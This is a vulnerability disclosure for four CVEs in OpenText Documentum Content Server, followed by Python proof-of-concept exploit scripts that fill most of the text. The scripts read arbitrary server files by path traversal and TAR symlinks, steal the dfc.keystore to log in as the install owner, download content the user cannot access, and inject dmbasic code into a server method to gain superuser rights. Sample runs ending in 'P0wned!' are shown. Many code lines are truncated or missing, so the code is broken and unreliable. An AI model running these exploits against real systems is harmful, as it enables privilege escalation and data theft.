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Multiple vulnerabilities in OpenText Documentum Content Server

CVE Identifier: CVE-2017-15012
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available

Opentext Documentum Content Server (formerly known as EMC Documentum Content 
does not properly validate input of PUT_FILE RPC-command which allows any
authenticated user to hijack arbitrary file from Content Server filesystem,
because some files on Content Server filesystem are security-sensitive
this security flaw leads to privilege escalation

CVE Identifier: CVE-2017-15013
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available

Opentext Documentum Content Server (formerly known as EMC Documentum Content 
contains following design gap, which allows authenticated user to gain 
of superuser: Content Server stores information about uploaded files in 
objects, which are queryable and "editable" (before release 7.2P02 any 
user was able to edit dmr_content objects, now any authenticated user may delete
dmr_content object and them create new one with the old identifier) by
authenticated users, this allows any authenticated user to replace content of
security-sensitive dmr_content objects (for example, dmr_content related to 
dm_method objects) and gain superuser privileges

CVE Identifier: CVE-2017-15014
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
Fix: not available

Opentext Documentum Content Server (formerly known as EMC Documentum Content 
contains following design gap, which allows authenticated user to download 
content files regardless attacker's repository permissions:

when authenticated user upload content to repository he performs following 
- calls START_PUSH RPC-command
- uploads file to content server
- calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET 
  purposed to identify the location of the uploaded file on Content Server 
- further user creates dmr_content object in repository, which has value of 
data_ticket equal
  to the value of DATA_TICKET received at the end of END_PUSH_V2 call

As the result of such design any authenticated user may create his own 
dmr_content object,
pointing to already existing content of Content Server filesystem

CVE Identifier: CVE-2017-15276
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available

Opentext Documentum Content Server (formerly known as EMC Documentum Content 
contains following design gap, which allows authenticated user to gain 
of superuser: Content Server allows to upload content using batches (TAR 
when unpacking TAR archives Content Server fails to verify contents of TAR 
archive which
causes path traversal vulnerability via symlinks, because some files on Content 
filesystem are security-sensitive this security flaw leads to privilege 

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content 
# contains following design gap, which allows authenticated user to gain 
# of superuser:
# Content Server allows to upload content using batches (TAR archives), when 
# TAR archives Content Server fails to verify contents of TAR archive which
# causes path traversal vulnerability via symlinks, because some files on 
Content Server
# filesystem are security-sensitive the security flaw described above leads to
# privilege escalation
# The PoC below demonstrates this vulnerability:
# MacBook-Pro:~ $ python CVE-2017-15276.py
# usage:
# OTDocumentumTarVulnerability.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15276.py docu72dev01 10001 dm_bof_registry 
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh
# Creating malicious dmr_content object
# Trying to find any object with content...
#     Downloading /u01/documentum/cs/shared/config/dfc.keystore
# Creating malicious dmr_content object
# Trying to find any object with content...
#     Trying to connect to docu72dev01:10001 as dmadmin ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# P0wned!

import io
import socket
import sys
import tarfile

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.identity import Identity
from dctmpy.obj.typedobject import TypedObject


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]

def main():
    if len(sys.argv) != 5:

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"

    admin_console = session.get_by_qualification(
        "dm_method where object_name='dm_JMSAdminConsole'")
    env_script = admin_console['method_verb']
    env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh')

    keystore_path = None
    script = str(download(session, env_script, bytearray()))
    if not script:
        print "Unable to download dm_set_server_env.sh"

    for l in script.splitlines():
        if not l.startswith("DOCUMENTUM_SHARED"):
        keystore_path = l.split('=')[1]

    if not keystore_path:
        print "Unable to determine DOCUMENTUM_SHARED"

    keystore_path += "/config/dfc.keystore"
    keystore = str(download(session, keystore_path, bytearray()))

    if not keystore:
        print "Unable to download dfc.keystore"

    (session, docbase) = create_session(
        sys.argv[1], sys.argv[2],
        session.serverconfig['r_install_owner'], "",
        identity=Identity(trusted=True, keystore=keystore))
    if is_super_user(session):
        print "P0wned!"

def download(session, path, buf):
    print "Downloading %s" % path

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")

    print "Creating malicious dmr_content object"

    session.apply(None, NULL_ID, "BEGIN_TRANS")

    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        end_tran(session, False)

    (bytes, length) = create_tar("test", path)
    b = bytearray()

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \

    content_id = session.next_id(0x06)

    if not session.start_push(handle, content_id, format['r_object_id'], 
        print "Failed to start push"
        end_tran(session, False)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_int("page", 0)
    content.set_string("page_modifier", "dm_batch")
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    content.set_bool("BATCH_FLAG", True)
    content.set_bool("IS_ADDRENDITION", True)
    content.set_id("parent_id", object_id)
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"
        end_tran(session, False)

    content = session.get_by_qualification(
        "dmr_content WHERE any (parent_id='%s' "
        "AND page_modifier='%s')" % (object_id, "vuln"))

    handle = session.make_puller(
        NULL_ID, store.object_id(), content['r_object_id'],
        format.object_id(), data_ticket

    if handle == 0:
        end_tran(session, False)
        raise RuntimeError("Unable make puller")

    for chunk in session.download(handle):

    end_tran(session, False)
    return buf

def create_tar(linkname, linkpath):
    bytes = io.BytesIO()
    tar = tarfile.TarFile(fileobj=bytes, mode="w", format=tarfile.GNU_FORMAT)
    add_link(tar, linkname, linkpath)
    text = io.BytesIO()
    text.write("file_name='%s'\n" % linkname)
    tarinfo = tarfile.TarInfo("property.txt")
    tarinfo.size = text.tell()
    tar.addfile(tarinfo, text)
    length = bytes.tell()
    return (bytes, length)

def add_link(tar, linkname, linkpath):
    tarinfo = tarfile.TarInfo(linkname)
    tarinfo.type = tarfile.SYMTYPE
    tarinfo.linkpath = linkpath
    tarinfo.name = linkname

def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)

def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False

def end_tran(session, commit=False):
    obj = TypedObject(session=session)
    obj.set_bool("COMMIT", commit)
    session.apply(None, NULL_ID, "END_TRANS", obj)

if __name__ == '__main__':
#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content 
# contains following design gap, which allows authenticated user to download 
# content files regardless attacker's repository permissions:
# when authenticated user upload content to repository he performs following 
# - calls START_PUSH RPC-command
# - uploads file to content server
# - calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET,
#    purposed to identify the location of the uploaded file on Content Server 
# - further user creates dmr_content object in repository, which has value of 
data_ticket equal
#    to the value of DATA_TICKET returned at the end of END_PUSH_V2 call
# As the result of such design any authenticated user may create his own 
dmr_content object,
# pointing to already existing content of Content Server filesystem
# The PoC below demonstrates this vulnerability:
# MacBook-Pro:~ $ python CVE-2017-15014.py
# usage:
# CVE-2017-15014.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15014.py docu72dev01 10001 dm_bof_registry 
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# Trying to find any object with content...
# Querying "inaccessible" dmr_content objects...
# Downloaded 3959/3959 bytes of object 06024be980000133
# Downloaded 11280/11280 bytes of object 06024be980000135
# Downloaded 10004/10004 bytes of object 06024be980000138
# Downloaded 23692/23692 bytes of object 06024be98000017a
# Downloaded 19541/19541 bytes of object 06024be980000180
# Downloaded 1096/1096 bytes of object 06024be980000172
# Downloaded 11776/11776 bytes of object 06024be98000011f
# Downloaded 50176/50176 bytes of object 06024be980000125
# Downloaded 16384/16384 bytes of object 06024be98000012f
# Downloaded 985/985 bytes of object 06024be9800001f5
# Downloaded 191/191 bytes of object 06024be9800001fe
# Downloaded 213/213 bytes of object 06024be980000200

import socket
import sys

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]

def main():
    if len(sys.argv) != 5:

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
    session.apply(None, NULL_ID, "BEGIN_TRANS")
    print "Querying \"inaccessible\" dmr_content objects..."
    for e in session.query(
            "SELECT * FROM dmr_content "
            "WHERE ANY parent_id IS NOT NULLID "
            "AND ANY parent_id NOT IN "
            "(SELECT r_object_id FROM dm_sysobject)"
        handle = 0
            content_id = session.next_id(0x06)
            obj = TypedObject(session=session)
            obj.set_string("OBJECT_TYPE", "dmr_content")
            obj.set_bool("IS_NEW_OBJECT", True)
            obj.set_int("i_vstamp", 0)
            obj.set_id("storage_id", e["storage_id"])
            obj.set_id("format", e["format"])
            obj.set_int("data_ticket", e["data_ticket"])
            obj.set_id("parent_id", object_id)
            if not session.save_cont_attrs(content_id, obj):
                print "Failed"

            handle = session.make_puller(
                NULL_ID, obj["storage_id"], content_id,
                obj["format"], obj["data_ticket"]
            if handle == 0:
                raise RuntimeError("Unable make puller")
            size = 0
            for chunk in session.download(handle):
                size += len(chunk)

            print "Downloaded %d/%d bytes of object %s" % \
                  (size, e['full_content_size'], e['r_object_id'])
            if handle > 0:

def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)

def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False

if __name__ == '__main__':
#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content 
# contains following design gap, which allows authenticated user to gain 
# of superuser:
# Content Server stores information about uploaded files in dmr_content objects,
# which are queryable and "editable" (before release 7.2P02 any authenticated 
# was able to edit dmr_content objects, now any authenticated user may delete
# dmr_content object and them create new one with the old identifier) by
# authenticated users, this allows any authenticated user to "modify" 
# dmr_content objects (for example, dmr_content related to dm_method objects)
# and gain superuser privileges
# The PoC below demonstrates this vulnerability:
# MacBook-Pro:~ $ python CVE-2017-15013.py
# usage:
# CVE-2017-15013.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15013.py docu72dev01 10001 dm_bof_registry 
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# Trying to find any dm_method object with content...
#     Trying to poison docbase method dm_Migration
# Method verb: dmbasic -eMigration_Agent
# Method function: Migration_Agent
# Trying to inject new content:
# Const glabel As String          = "Label"
# Const ginfo As String           = "Info"
# Const gerror As String          = "Error"
# Private Sub PrintMessage(mssg As String, mssgtype As String)
# If(mssgtype=glabel) Then
# Print "<BR><B><FONT size=3>"
# Print mssg
# print "</FONT></B>"
# ElseIf(mssgtype=ginfo) Then
# Print "<BR><FONT color=blue>"
# Print mssg
# print "</FONT>"
# ElseIf(mssgtype=gerror) Then
# Print "<BR><FONT color=red size=3>"
# Print mssg
# print "</FONT>"
# Else
# Print "<BR>" & mssg
# End If
# End Sub
# Private Sub SetupSuperUser(TargetUser As String)
# objectid$ = dmAPIGet("id,c,dm_user where user_name = '" & TargetUser & "'")
# If objectid$ <> "" then
# Status = dmAPISet("set,c," & objectid$ & ",user_privileges",16)
# Status = dmAPIExec("save,c," & objectid$)
# End If
# End Sub
# Sub Migration_Agent(DocbaseName As String, UserName As String, TargetUser As 
# Dim SessionID As String
# SessionID= dmAPIGet("connect," & DocbaseName & "," & UserName & ",")
# If SessionID ="" Then
# Print "Fail to connect to docbase " & DocbaseName &" as user " & UserName
# DmExit(-1)
# Else
# Print "Connect to docbase " & DocbaseName &" as user " & UserName
# End If
# Call SetupSuperUser(TargetUser)
# End Sub
# Removing method's content
# method's content has been successfully removed
# Creating malicious dmr_content object
# Malicious dmr_content object has been successfully created
# Becoming superuser...
# P0wned!
# MacBook-Pro:~ $ python CVE-2017-15013.py docu72dev01 10001 dm_bof_registry 
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# Current user is a superuser, nothing to do

import socket
import sys


from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]

def main():
    if len(sys.argv) != 5:

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"

    print "Trying to find any dm_method object with content..."
    method_object = session.get_by_qualification(
        "dm_method WHERE use_method_content=TRUE "
        "and method_verb like 'dmbasic -e%'")
    method_content = session.get_by_qualification(
        "dmr_content where any parent_id='%s'"
        % method_object['r_object_id'])

    print "Trying to poison docbase method %s" % method_object['object_name']
    method_verb = method_object['method_verb']
    print "Method verb: %s" % method_verb
    method_function = method_verb[len("dmbasic -e"):]
    print "Method function: %s" % method_function
    new_content = \
        "Const glabel As String          = \"Label\"\n" \
        "Const ginfo As String           = \"Info\"\n" \
        "Const gerror As String          = \"Error\"\n" \
        "\n" \
        "Private Sub PrintMessage(mssg As String, mssgtype As String)\n" \
        "  If(mssgtype=glabel) Then\n" \
        "            Print \"<BR><B><FONT size=3>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT></B>\"\n" \
        "  ElseIf(mssgtype=ginfo) Then\n" \
        "            Print \"<BR><FONT color=blue>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT>\"\n" \
        "  ElseIf(mssgtype=gerror) Then\n" \
        "            Print \"<BR><FONT color=red size=3>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT>\"\n" \
        "  Else\n" \
        "            Print \"<BR>\" & mssg\n" \
        "  End If\n" \
        "End Sub\n" \
        "Private Sub SetupSuperUser(TargetUser As String)\n" \
        "   objectid$ = dmAPIGet(\"id,c,dm_user where user_name = '\" & 
TargetUser & \"'\")\n" \
        "   If objectid$ <> \"\" then\n" \
        "      Status = dmAPISet(\"set,c,\" & objectid$ & 
\",user_privileges\",16)\n" \
        "      Status = dmAPIExec(\"save,c,\" & objectid$)\n" \
        "   End If\n" \
        "End Sub\n" \
        "\n" \
        "Sub %s(DocbaseName As String, UserName As String, TargetUser As 
String)\n" \
        "  Dim SessionID As String\n" \
        "\n" \
        "  SessionID= dmAPIGet(\"connect,\" & DocbaseName & \",\" & UserName & 
\",\")\n" \
        "  If SessionID =\"\" Then\n" \
        "    Print \"Fail to connect to docbase \" & DocbaseName &\" as user \" 
& UserName\n" \
        "    DmExit(-1)\n" \
        "  Else\n" \
        "    Print \"Connect to docbase \" & DocbaseName &\" as user \" & 
UserName\n" \
        "  End If\n" \
        "\n" \
        "  Call SetupSuperUser(TargetUser)\n" \
        "\n" \
        "End Sub\n" % method_function
    print "Trying to inject new content:\n%s" % new_content

    session.apply(None, NULL_ID, "BEGIN_TRANS")

    if method_content is not None:
        print "Removing method's content"
        remove = TypedObject(session=session)
        remove.set_string("OBJECT_TYPE", "dmr_content")
        remove.set_int("i_vstamp", method_content['i_vstamp'])
        obj = session.apply(RPC_APPLY_FOR_BOOL, method_content['r_object_id'], 
"dmDisplayConfigExpunge", remove)
        if obj != True:
            print "Failed to remove method's content, exiting"
            end_tran(session, False)
        print "method's content has been successfully removed"

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")

    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        end_tran(session, False)

    b = bytearray()

    if not session.start_push(handle, method_object['i_contents_id'], 
format['r_object_id'], len(b)):
        print "Failed to start push"
        end_tran(session, False)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    print "Creating malicious dmr_content object"
    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", method_object['r_object_id'])
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(method_object['i_contents_id'], content):
        print "Failed to create content"
        end_tran(session, False)

    print "Malicious dmr_content object has been successfully created"

    end_tran(session, True)

    print "Becoming superuser..."
    method = TypedObject(session=session)
    method.set_string("METHOD", method_object['object_name'])
    method.set_string("ARGUMENTS", "%s %s %s" % (
    session.apply(RPC_APPLY_FOR_OBJECT, NULL_ID, "DO_METHOD", method)
    r = session.query(
        "SELECT user_privileges FROM dm_user "
        "WHERE user_name=USER") \
    if r != 16:
        print "Failed"
    print "P0wned!"

def end_tran(session, commit=False):
    obj = TypedObject(session=session)
    obj.set_bool("COMMIT", commit)
    session.apply(None, NULL_ID, "END_TRANS", obj)

def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)

def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False

if __name__ == '__main__':
#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content 
# does not properly validate input of PUT_FILE RPC-command which allows any
# authenticated user to hijack arbitrary file from Content Server filesystem,
# because some files on Content Server filesystem are security-sensitive
# the security flaw described above leads to privilege escalation
# The PoC below demonstrates this vulnerability:
# MacBook-Pro:~ $ python CVE-2017-15012.py
# usage:
# CVE-2017-15012.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15012.py docu72dev01 10001 dm_bof_registry 
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh
# Trying to find any object with content...
#     Downloading /u01/documentum/cs/shared/config/dfc.keystore
# Trying to find any object with content...
#     Trying to connect to docu72dev01:10001 as dmadmin ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  
# P0wned!

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient, NULL_ID
from dctmpy.identity import Identity
from dctmpy.obj.typedobject import TypedObject


def usage():
    print "usage:\n\t%s host port user password" % basename(sys.argv[0])

def main():
    if len(sys.argv) != 5:

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"

    admin_console = session.get_by_qualification(
        "dm_method where object_name='dm_JMSAdminConsole'")
    env_script = admin_console['method_verb']
    env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh')

    keystore_path = None
    script = str(download(session, env_script, bytearray()))
    if not script:
        print "Unable to download dm_set_server_env.sh"

    for l in script.splitlines():
        if not l.startswith("DOCUMENTUM_SHARED"):
        keystore_path = l.split('=')[1]

    if not keystore_path:
        print "Unable to determine DOCUMENTUM_SHARED"

    keystore_path += "/config/dfc.keystore"
    keystore = str(download(session, keystore_path, bytearray()))

    if not keystore:
        print "Unable to download dfc.keystore"

    (session, docbase) = create_session(
        sys.argv[1], sys.argv[2],
        session.serverconfig['r_install_owner'], "",
        identity=Identity(trusted=True, keystore=keystore))
    if is_super_user(session):
        print "P0wned!"

def download(session, path, buf):
    print "Downloading %s" % path
    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \

    session.apply(None, NULL_ID, "BEGIN_TRANS")
    store = session.get_by_qualification("dm_filestore")
    format = session.get_by_qualification("dm_format")
    remote_path = "common=/../../../../../../../../../..%s=Directory" % path
    result = session.put_file(store.object_id(), remote_path, 
    full_size = result['FULL_CONTENT_SIZE']
    ticket = result['D_TICKET']

    content_id = session.next_id(0x06)
    obj = TypedObject(session=session)
    obj.set_string("OBJECT_TYPE", "dmr_content")
    obj.set_bool("IS_NEW_OBJECT", True)
    obj.set_int("i_vstamp", 0)
    obj.set_id("storage_id", store.object_id())
    obj.set_id("format", format.object_id())
    obj.set_int("data_ticket", ticket)
    obj.set_id("parent_id", object_id)
    if not session.save_cont_attrs(content_id, obj):
        raise RuntimeError("Unable to save content object")

    handle = session.make_puller(
        NULL_ID, store.object_id(), content_id,
        format.object_id(), ticket

    if handle == 0:
        raise RuntimeError("Unable make puller")

    for chunk in session.download(handle):

    return buf

def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)

def is_super_user(session):
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False

if __name__ == '__main__':